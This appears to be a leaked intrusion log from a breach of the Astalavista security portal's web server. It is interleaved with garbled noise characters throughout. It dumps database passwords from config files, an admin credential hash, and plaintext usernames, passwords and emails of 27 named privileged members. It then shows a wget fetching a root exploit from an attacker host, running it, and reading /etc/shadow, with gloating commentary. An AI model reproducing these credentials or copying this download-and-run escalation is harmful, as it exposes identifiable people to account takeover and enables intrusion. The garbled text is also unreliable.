drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..' `' @2 }4 ]; s3 A, v/ H% o$ f" X
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
4 m J! \+ V$ \+ ^8 Rdrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql/ N! h/ I2 R& p% w3 K% v
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com7 u" A$ \ k' c8 \/ X- C. ^
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
" Q6 O( Z7 c1 [& z6 U3 A0 I: \drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner5 g3 G+ `! }& E q
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg0 v- s( ~* o8 F6 C1 v
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
3 c! T/ d* q/ I) k! a$ a- Rdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron0 J9 I$ F( \7 Z: e
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd: I3 O" e4 W5 j1 \8 O8 c9 @* u+ p. k
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php& W: I: a6 y- _
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico( Q( `( G3 P( N+ w
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed! k$ J: n1 R! c9 \% d* S6 G
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
+ r6 {) B8 d0 t$ F: ~) C" A$ u, Y-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess$ R2 ^8 z0 _/ A8 z3 C/ v
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
: a0 z @: g0 H2 A/ ~2 E/ g9 Q-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
, E* m R- a5 s- y-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
" c' d6 R3 q2 K; @-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
/ P! c, _- x- x- g# G- m U2 Z( Z0 h-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php5 J# c' U2 u) v7 F0 J% c
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
& j* V+ }, y( ]) [+ j C# p' t5 Ydrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
/ x4 @) G) n& o4 ]drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang% `5 e& f/ ~/ u. t I
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
4 B. O9 u' k3 x/ C1 }: E+ X( ^ f% ?drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
N- N5 h3 v" udrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
5 \' K) u& a& Mdrwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata4 K0 C( ~' |, f0 g* G
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
8 [ t$ t* q0 n7 N: F-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf5 R7 S& k5 p1 \/ n2 M/ F6 Z- X% C
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
2 r$ M6 i9 ~4 j- W& E+ N-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt0 J7 T" y A; u% h. t
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
8 ^7 P% h- d1 U( }( p' r' e. ?! Edrwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources; }8 y/ [) G3 Z+ c3 c
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
# h1 r' C5 D, H$ o3 s! Z1 j7 I* Fdrwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes6 @( g% {- ]$ ?& U1 F: M
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src6 z, X7 U+ X% `$ Y0 z
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
2 q% z; F% V! f! k. odrwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v28 m; j( N9 l. r. m
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
% @3 d$ S |# ^/ w( \4 Q+ |-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
3 A- K2 L! B( P* C& ^+ Q4 qdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki( }3 r. S+ b4 |7 R+ c+ S" f
1 x5 x) l, I: ?# { c5 s+ _7 e$ B
sh-3.2$ head -20 index.php4 e4 [1 f$ A3 K& d8 H8 W6 M
<?PHP6 C( t f4 J B: p6 U3 k- e" c
/*** [: a, \* ?7 S
* Mainfile (external) for astalavistaNET v2.05 Z/ A5 I! m2 L; `3 J) A9 S
*
# ~5 g+ k$ l( E1 j* @copyright Astalavista IT Engineering GmbH
0 x* l) S3 |6 y2 J- K. @* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>; I, h( o V/ I% V5 H
* @version 1.0
: l" y ~$ [' ^# O6 W v: m, e- x*/
. A: Q$ }1 r' M- ~- Y. c. z: R6 J& @7 z0 j. z3 b' F
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
: B8 Q6 q9 }3 V! x4 y! c $dontStartSession = false;
]; Z* Z3 L/ y* L } else {
* |, G' r- l& V+ z4 s $dontStartSession = true;# X. ]# M" P2 O; x
}
- o: ?' _( C3 w* @6 A& `5 B require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);. s- w# c+ Q4 I
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
- l/ o; ^8 F0 n; j7 s \ require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);3 Y+ ?8 q) T2 L/ V q- ^( N
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);+ v; h: c4 O* j v. n+ \
" R+ R" u( W% m( Y+ X- E& n2 Ssh-3.2$ cd config- \. q* f' C3 U. v& [; C
sh-3.2$ ls -la* C5 C- a# A' s* ~
total 32
1 q! J' ?# T1 H/ odrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .; o- e* l0 h3 M3 v+ [0 @- q) l) K
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..; A* J# |# m: Z
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
. o# q* Q! o" v' [-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php: E# W! @$ q( e8 t4 u+ J% g" @$ A
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php T* l; `5 b4 O$ h
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
% }: R: {/ r2 m/ H( t. e3 [8 |-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
" d: }5 [ w2 q' o: i3 o: n' P. u. r/ Z- D0 }. d
sh-3.2$ cat com.conf.php
% y; P% t Q! y( u1 U- U: E[snip]- N. }! U7 H& ~
//member-database* E i: k: N1 X. F
$_CONFIG['db_mem_server'] = ‘localhost’;
" B4 h) @3 ]' w" X( \5 A$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;* w1 ~! } d$ ?; t/ R* i# B
$_CONFIG['db_mem_user'] = ‘astanet_db’;
4 V4 y3 B: H' Q3 D$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
6 v4 y" }3 g% r/ F0 a$_CONFIG['db_mem_debug'] = false; //true or false1 X6 S# Z, A2 m" \
//ads-database
7 h ^3 f, O) p* [% V$_CONFIG['db_ads_server'] = ‘localhost’;
6 {3 L, P4 \7 D) G/ v7 c$_CONFIG['db_ads_database'] = ‘astanet_ads’;
+ n# }- V- \& N$_CONFIG['db_ads_user'] = ‘astanet_db’;1 t' N9 R3 ^3 ?( \/ T2 q$ d$ e
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
4 M' R. X9 W- G9 g- X4 L$_CONFIG['db_ads_debug'] = false; //true or false% t7 q" J9 K, [- k* ]
//rainbow-database& F0 R' W2 ] n1 j# V2 T0 k
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;- ^) x0 Q, ~; K2 J1 x
$_CONFIG['db_rainbow_database'] = ‘rainbow’;7 q4 o2 `) C+ {( V1 ]3 Z
$_CONFIG['db_rainbow_user'] = ‘dinu’;& ]* T. w$ h. P5 T, p X
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;5 q4 J* a8 z7 B
$_CONFIG['db_rainbow_debug'] = false; //true or false. m3 e" H# w: e& q; \7 S4 j0 R1 x
//mailing lists database6 z0 i# |" E. W0 T( n( S
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
: K8 z, p+ c1 g; c9 B c8 o! ?$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
+ k' R4 }$ p L; I; H& r$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;' M2 ]0 r2 o8 l, ^ V' R" p
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;, i/ [6 G$ `. q3 O! F) q2 f. T! U- s2 {
$_CONFIG['db_mailing_lists_debug'] = false; //true or false
' h9 U" t' |1 C2 }0 r6 D% R- a% K//paypal
* S/ r6 O) E8 |$ [" w$ C( I$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
4 }' b h1 `' r. y' N( ]- {1 `$_CONFIG['sub_pp_cmd'] = ‘_xclick’;& m4 P. o3 T3 t/ z
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
- V0 n3 t! b4 S; P% T$_CONFIG['sub_pp_noship'] = ‘1′;* D, T- C l! f5 e& T6 }
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’; a9 I2 U, a9 A* G7 [9 N, O
[snip]
1 y$ |5 @2 ?7 @9 p2 w3 v
0 p' o4 L p& Ish-3.2$ cd ..
- w. r1 c: ?) rsh-3.2$ cd member# B% B! p7 M+ E* G1 k! \
sh-3.2$ ls -la w! O, Q, S, z6 h' G- }! B9 Z
total 20
! I) S" f# B' F. H+ ?( F1 F0 Q) E6 Odrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
% b0 I6 E2 [! y; y1 _, W$ r3 L$ Ldrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..4 v# k. F* g9 ]
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess, U3 @* n- c& T9 [! o: J. n/ V
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php* Y: p; E/ Z" {- ^" q$ `
sh-3.2$ cat .htaccess
$ _6 n h3 _8 d$ zSecFilterEngine off
$ |, E4 d* x+ ^9 I- {% H1 ^
1 r1 Y/ ~2 h3 U! I$ xsh-3.2$ cd .." _; x9 z! @: v j
sh-3.2$ cd cron
* @) J8 Y# i' Ish-3.2$ ls -la% Q$ Z$ B6 @( O7 H: H( q" [
total 168
/ N' z$ _# d* v' M" Q* D$ }drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
( I9 s* e7 m0 jdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
' `5 r; c: I3 I B- [-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
0 @2 B& c% b& @( ?-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php2 l+ |% i" h3 t8 s
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
# X: M; @/ O( u* J+ J7 ]# d4 V* @" l-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php- [$ H2 I# i# E. [
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
! Y9 Y& ]" f1 f& F. [2 u/ A0 M-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
/ n" j, O: k2 i4 O, J-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
" H. q9 c. k2 [9 F: _0 g" E* g-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
7 O. f! k8 F3 d' G9 n* B-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
- n+ f. N* S2 P$ i% T-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php N! p0 p8 ?% x8 o+ g* [& K. o
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php7 g+ U$ F( F( l, ]! Z. Z2 V8 D5 e
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php' o+ P1 d% h) ]* v
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh# V- @" @7 K& O3 Y( r
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
4 ~$ H" T. q9 R6 @* B-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
1 r$ t7 G9 P% G( E/ I" H! I/ D" N3 n-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
Y5 d5 \4 V/ [-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php9 _/ }, L5 @ X: J7 _
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php2 Q a2 i: L9 f
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email+ }% N" C5 | A- [
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
& z5 I) S# P5 }0 R) c. @8 v# t& r-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php2 B3 v \5 W. o. F3 }) z2 m
/ s6 c6 ~: j% X
sh-3.2$ cd ..
0 ?# h1 V5 y( k( k! Rsh-3.2$ cd _007
, z% S4 H) ^5 gsh-3.2$ ls -la
5 w$ f! S" z0 d7 D) jtotal 24: U n5 t v; a7 m9 |
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .: d/ C( {$ H; o
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..% f7 @3 Q# g8 J+ b1 O Z
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
0 g4 L9 a% {5 q4 _" M3 {1 k-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php% N8 `, H9 Y$ P1 s4 ]" N) I+ _
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php0 f2 H- ^: ^' w7 c
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap9 Q& s7 p( Q. Y) ]2 `8 |# b
: d; A# N; `2 q, k7 Ysh-3.2$ cat .htaccess% z$ M0 T# ^8 ]6 o- B7 h0 U! K
authType Basic2 ~, C% L* @+ n- `+ P& q7 P3 w& e
authName Admin2 Q9 X! U* U3 w( c
authUserFile /home/astanet/auth/.htadm_pwd
- g" |3 Q$ G$ [% Qrequire valid-user
: D* p1 }; B0 \4 c N- t
5 |; w( l6 N% z5 Y: ]& J- x/ D$ xsh-3.2$ cat /home/astanet/auth/.htadm_pwd$ r5 U: x9 T" c, [7 O; [ B
admin2net:CR0bl65MwhfT/ o& G. w- A; O' z0 f9 h) s+ `
% D9 `1 w8 a' n4 ?/ ~sh-3.2$ mysql -u astanet_db -p
I1 ^3 H5 |0 U5 O2 vEnter password:% b1 k2 M# o5 [) \
Welcome to the MySQL monitor. Commands end with ; or \g.7 ~& q% ^& J, v- B4 e
Your MySQL connection id is 275153
6 K# k6 e/ j% l: W$ Z9 P8 D$ OServer version: 5.0.45-community-log MySQL Community Edition (GPL)
5 `0 q& q; e, }" h, G( r' J5 o* ]0 |
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.1 ?3 T5 N" B1 F0 Q$ Q
0 U+ ?6 i1 I+ O8 w
mysql> show databases;% ]5 W+ V1 U) W% q d
+———————–+3 A5 l4 k6 {, i; h2 q+ P
| Database |- h$ c$ v- b" H/ _ c& j1 H
+———————–+& u5 d$ b* {0 e5 F, J' h; K
| information_schema |
* J& J1 g' a, m$ ^- ^3 B- ?| astanet_ads |. }4 ~8 q; F/ F+ y. F
| astanet_mailing_lists |
5 p& s% W' m: U) a" j+ z# {| astanet_mediawiki |
0 P F# }: S# W| astanet_membersystem |
( z* T/ Y' O& w* o9 {3 P6 P| test |* g9 |; x/ w% I1 L
+———————–+
* d8 V a C& w. F; }$ J6 rows in set (0.00 sec)7 v9 R, j9 |8 p! v& {
M( R, m6 z* d6 F8 _: `0 W& G& y* Omysql> use astanet_membersystem
0 {* Z0 \+ j' {- X3 I! D FDatabase changed
1 z1 M5 W, i9 V0 Q' m( V: Y% Wmysql> show tables;+ T& p- [ _0 T J$ h5 B
+———————————–+
# O9 x0 f: V$ U5 D+ P; A) X. F| Tables_in_astanet_membersystem |. K# M- k" t# b* ~; z
+———————————–+
- q8 Y( b" @9 Y3 L5 A5 D. z t+ v| blacklist_categories |( X6 K% [/ `: |( }+ _- I3 ^* h
| blacklist_content |
2 W- ~7 [- w! F g' ^* d& m, u| blacklist_levels |
; f! r, ^ C/ {3 U5 ], f+ X| blacklist_mcset |
; k s* l1 D# N| dir_categories |
2 }# j* a% e) W! b9 `4 _| dir_comments |7 s5 @* K$ H8 |. _9 _1 O
| dir_links |
; N% b1 ~. G, ?3 S: C& p5 @* L% G7 Q| dir_temp |
# t6 \5 o" z6 b9 x1 V& {9 N% \| dir_votes |
, b% \$ @1 x) S' B& V2 T| documents |0 S* d0 Q# {+ g, q' n8 M, ?! O
| documents_categories |0 @6 ] I4 W, R! G/ L
| email_content |' B7 d' J, R% o+ ^5 T- P% q
| email_settings |; t: u- y: S2 m2 P4 y+ Q) T7 }* I
| exploits |3 m& t- H' H/ x3 A
| exploits_categories |0 p# Y6 p0 m9 ~& ]* y
| exploittree_categories |6 t: Q* s5 ?' i8 }- \& }% I/ ?7 }+ r
| exploittree_exploits |1 Q8 z& W2 C( T, m" i3 S
| home_values |' e9 d3 V! k9 t0 H! i w9 [1 P: ^: M
| iso_countries |
, G. {- J. L$ V/ ~% x- A| links_categories |5 E, d" q! Y& Q5 ?
| links_records |! N# h& ^9 e; ?" _, U. v) I
| links_unauth |9 S. O5 i7 U+ L- |! Q
| links_votes |% ^7 _ O+ m6 `4 I7 ]
| log |# o* l, ~- d! e$ h
| news_categories |3 w5 L& X' p$ y- Z# N' F/ H& ^
| news_comments |# O. Z5 y/ A% _2 b
| news_emoticons |% U: m2 X5 ~" l: J! O G, o6 B8 t
| news_latest |1 Q, u) @5 }6 J9 Y- D5 q$ w9 t
| news_messages |
3 C9 |% B" B$ d* g# t! F: c| news_statistics |# G, `4 j k x* P0 h" R
| news_votes |; G! o; v% l7 J2 ]4 |* r
| prices_content |
# J! y: L9 c) u e" I) {| prices_offers |* W( l* M2 n) F8 Z! }& P2 o
| rss_settings |7 q4 c4 x* v( b' D: G6 r6 U
| sessions |
' d: `- C( D7 t- f| stats_signups |; z) c* a E, {* e0 B7 D! y0 J
| u2u2 |
4 i( r6 D7 ?/ }" Z" H% [| u2u_contact |/ _8 X5 l( F$ E/ A0 }/ y1 D
| u2u_settings |. f& Q) @3 |( Q& T9 O
| user_keywords_selected_categories |# N! H' n( V- J6 w
| users |
3 a& R( m k) [1 T& T| users_ipn_test |
" c* y7 M* |4 g| users_keyword_values |
, }) r: H& ]" M' o0 J1 X| users_profile |" {/ P) W7 [" n: _
| users_temp |
8 ] ]. K4 m' o, |+ k* r4 t6 C/ r| users_upgrade |! g2 @! u4 J% w# l, _( w" }
+———————————–+; c- y1 `3 r5 J, D. M: f6 b
46 rows in set (0.00 sec)) I N" q' E+ _. k9 Z' P
8 ?& B) J' C% g z
mysql> describe users;
. h) Y! j# m/ R$ W: M8 p% a+ z+————————–+————————————–+——+—–+———————+—————-+3 r, ?5 L/ z" Z! d4 E5 G1 `, |
| Field | Type | Null | Key | Default | Extra |
" d$ z2 n- ~( b9 I+————————–+————————————–+——+—–+———————+—————-+
' }; a+ F5 a! D/ j: g1 ^: \4 |$ M3 B| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
0 u3 q- b' ^5 A| user | varchar(50) | NO | | | |- C4 H4 {! _5 G
| nickname | varchar(30) | NO | MUL | anonymous | |
7 b6 g' b, Z: c' H2 N; _5 O [| password | varchar(30) | NO | | | |
, d. A1 Y0 o9 L; r| userlevel | tinyint(3) | YES | MUL | NULL | |
! ]! r0 Y7 M5 e3 r% u| exp | int(8) unsigned | NO | | 0 | |
6 O9 K( r, W; i( J R* m& ]8 h" ^| email | varchar(50) | NO | | | |$ X' S5 x! U3 V d7 r0 j
| ip | varchar(15) | NO | | 0 | |
; @- l; P; b1 I$ w3 \9 \8 O| proxy | set(’0′,’1′) | NO | | 0 | |
, i5 P# f$ X1 m4 d/ M9 W) @! _! _9 P| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |0 L1 W9 n! A/ v1 n
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
`2 S8 v6 N; T7 R| anz_in | tinyint(1) | NO | | -1 | |: Z# Y) O* H3 P4 v& c
| status | tinyint(1) unsigned | NO | | 0 | |
/ N* h/ s x: M& [0 [9 v6 E5 I| checked | set(’0′,’1′,’2′) | NO | | 0 | |
4 \. Z. z' _# i1 X8 c| freemember | set(’0′,’1′) | NO | | 0 | |& }7 H0 k8 i6 V
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
% |% o2 n3 s, \; J9 W$ R| lang | tinytext | NO | | | |4 N% B3 ]& C. S6 V7 R; d
| adid | smallint(6) | NO | | 0 | |
0 h8 r2 X4 m7 z) ~5 g v, \) }$ Q$ || pp_txn_id | varchar(255) | YES | | NULL | |
" I& I6 O" C! r2 V+ Y| cnb_transaction_id | varchar(255) | YES | | NULL | |1 u7 S& V) Z: A& `- @1 o
| cnb_order_id | varchar(255) | YES | | NULL | |6 T! H; n, F Y
| cnb_user_id | int(11) | YES | | 0 | |
; `" o+ j. g, O, W- L, N+————————–+————————————–+——+—–+———————+—————-+
7 N/ o* r( _# h* N5 g22 rows in set (0.01 sec)/ H' u2 R$ {) \
& e- ]8 T) Z6 d. cmysql> select count(*) as skids from users;7 ^4 w9 |1 I" V8 ?; F
+——-+3 C( Z% e* v2 ]3 J% N
| skids |
% Z$ C0 o* ]2 w2 X$ {9 ?+——-+! \, l: P, C& j% R
| 25199 |: d; ?7 n/ o5 t! n8 n
+——-+
$ x5 A( _, E; ?* z3 @' g1 row in set (0.00 sec)" s0 H; l9 Y, ^: R( J# O0 O8 v D3 J
- h( m" Y5 e" I0 gmysql> select user,nickname,password,email from users where userlevel = 1;
# R( f+ o1 Y8 ?6 e# z- N& a+————————–+———————-+——————+———————————–+2 ~$ d r) N8 `; g! u/ ~
| user | nickname | password | email |, X: _: d: g; {" R* c4 f% C
+————————–+———————-+——————+———————————–+( f# s% [) Y& Z5 Q
| pascal | prozac | astaman3 | 链接标记info@astalavista.net |- O2 ^% R3 K9 O/ b
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |2 z$ G& G! P8 S+ ? g- X
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
8 g) V5 x" P; K6 k| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |$ ?# C" y% ^( D6 G3 z6 ~0 N
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
0 ^7 d; r6 U1 p; Z! v* a$ O8 N| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
% _1 d4 I* b8 h0 s. b| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |" I. Q0 D" W+ N( n, P
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |4 v' S" d A6 w6 `3 K6 d
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
, U2 Q7 r' ^6 V3 D, o, b: X| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |4 C& Y9 x: l% D( R3 N$ T. r
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
; m$ ^% U5 v. r R) l) j) S| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
2 I, t' a' I6 o- M$ J| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |$ J# @% L( g J5 V
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
& r( a, k$ J* {: o( M) A| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
; Q. d3 R4 ?9 u) m8 V| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
' T1 X7 Y: o6 M2 L, G/ J. ^2 p| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |! K, R; C6 I5 ~& A1 v7 x4 e
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |" a9 l* K' W* q: D% s
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
/ E2 ]9 f- z' ]. Z- n& w( @+ u" g| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
" R2 F& f9 n; H1 ~. |/ z| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
" Q& b. p, X" u" M| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
8 ]- Z$ G. E+ E# v" W; j$ H% F* e9 M| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
% l, X. x8 V3 L6 {+ r/ k5 G; o| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
7 Y! X6 m7 i0 L( S; _3 X| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |0 s# z$ C. B: Y" a, W" E8 u
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
) q6 {4 s5 ^7 d7 A) y| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
+ Z l! a0 y% t5 h+————————–+———————-+——————+———————————–+
) q O- l: J; I- f27 rows in set (0.00 sec)
9 U' P- H( @/ a) x3 y3 A
* B2 d7 ]+ |) y) ~mysql> exit;
: A, j- a+ |0 x4 L5 T, P) g, d kBye. H8 \2 w- v. K( E
! [& A+ a9 i1 }1 Y
[~] plaintext passwords? yes,$ W R4 U1 b1 i6 E6 f8 e
Those so called “security professionals” who charge you $6.66 / month to
% a& T& F1 ]) ]; u! ]register at their hack-proof portal, save your passwords in plaintext…
/ K4 u+ `- n: |brilliant!
( f3 j+ V8 h: x9 ^6 G2 m/ b, u1 f8 p$ Z8 K
[~] This been fun but we want more.3 D8 W6 e, a" \$ v- u# d7 ?+ O
/ S4 ], ^7 e9 q/ Hsh-3.2$ uname -a
$ ?4 b9 f, A( ZLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
1 F/ D5 j+ v6 M; p+ l' P% \* v) Wsh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
$ K3 M* [& T/ s6 Y, R5 s. i–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]) O- n [0 t/ l* o
Resolving anti.sec.labs… 13.33.33.37- ^% ~# o/ ~; G
Connecting to anti.sec.labs|13.33.33.37|:80… connected.
) F* n" _$ A, x: N! tHTTP request sent, awaiting response… 200 OK( q6 a r! w5 ^# i
Length: 18200 (18K) [text/plain]
; m. M% ]9 h/ s- j3 kSaving to: `g0troot’/ ]: S/ H# T8 k5 k9 U+ o% S
: z- b5 r6 E# t' M! z# C& b% n
100%[=========================================================================================================================================>] 18,200 58.6K/s in Z9 A! W- R, O0 S. [, r# M) ^
0.3s
" r' c% \0 [ X3 p% G( C& R, R
" Y' `2 U8 A3 \6 {$ N18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
U# `+ \8 B% f% e+ u1 v7 u% {2 X+ K0 k ?
sh-3.2$ ./g0troot -i x86_64' f! t' S( x8 k
[+] g0troot - anti.sec.labs
' \0 h# q( r+ U$ K' o+ E' j[+] Target: 2.6.18-128.1.10.el5
: V1 `& H$ j: P3 Z$ ~; \7 r[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
& x1 f6 K7 O! I) ^
" Y+ q- ^5 X4 n8 {! G+ O[+] r00tr00t: N! T9 Y0 u0 s6 J) P
[~] Executing shell…4 ^: y7 h4 Z( Z' d4 M
2 g& t& Y5 ^" \- q% ]* [sh-3.2# id
% B# v, N6 s3 L; W4 V* s9 p) Zuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
) n6 W7 U0 e' B* N* ?! s
4 [3 n- h( A2 F- A) C( }* Psh-3.2# cat /etc/shadow9 F- L; F, y" Z7 A1 L
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::9 \1 J Q+ D3 G1 G" s% t! j+ X
[snip]
0 k, h5 l [3 z% R1 A" ]admin 1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::0 s, M+ [: Q' w4 r( {- Z
